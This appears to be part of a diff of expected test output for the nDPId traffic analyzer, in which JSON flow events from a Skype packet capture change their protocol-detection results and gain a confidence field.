 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970691783,"flow_last_seen":1431970692055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51300,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970691783,"flow_last_seen":1431970692055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51300,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.167","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.144","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.162","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00623{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970685852,"flow_last_seen":1431970686318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.167","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.144","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.162","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970685852,"flow_last_seen":1431970686318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970685852,"flow_last_seen":1431970686318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00621{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686319,"flow_last_seen":1431970686843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51285,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686319,"flow_last_seen":1431970686843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51285,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686319,"flow_last_seen":1431970686843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51285,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00626{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970690890,"flow_last_seen":1431970691584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51296,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970690890,"flow_last_seen":1431970691584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51296,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970690890,"flow_last_seen":1431970691584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51296,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970690890,"flow_last_seen":1431970705762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":2522,"flow_avg_l4_payload_len":168,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00608{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970690890,"flow_last_seen":1431970705762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":2522,"flow_avg_l4_payload_len":168,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970690890,"flow_last_seen":1431970705762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":2522,"flow_avg_l4_payload_len":168,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00623{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431970691584,"flow_last_seen":1431970703178,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431970691584,"flow_last_seen":1431970703178,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431970691584,"flow_last_seen":1431970703178,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.144","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.172","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.173","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
